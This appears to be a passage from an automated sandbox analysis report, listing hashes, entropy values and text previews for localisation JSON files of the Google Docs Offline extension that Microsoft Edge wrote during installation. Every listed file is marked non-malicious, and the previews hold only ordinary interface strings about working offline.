                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                      Malicious:false
